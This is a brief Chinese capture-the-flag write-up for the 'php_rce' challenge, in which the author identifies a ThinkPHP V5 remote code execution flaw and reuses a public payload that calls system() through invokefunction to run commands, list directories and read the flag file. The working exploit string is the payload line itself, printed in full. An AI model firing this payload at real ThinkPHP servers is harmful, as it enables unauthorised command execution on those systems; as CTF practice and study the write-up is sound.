WP 攻防世界 php_rce 题目: WP: 各种办法没有收获,上网搜索后发现原来是有个ThinkPHP V5漏洞,并且在github上就已经提交过 找到相应版本的payload: ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 改变payload查看当前目录下的文件 emmm…无重要信息,接着查看上一级目录: 继续查看上一级目录… 发现flag文件!(搓手手~)来瞧瞧它 找到flag了~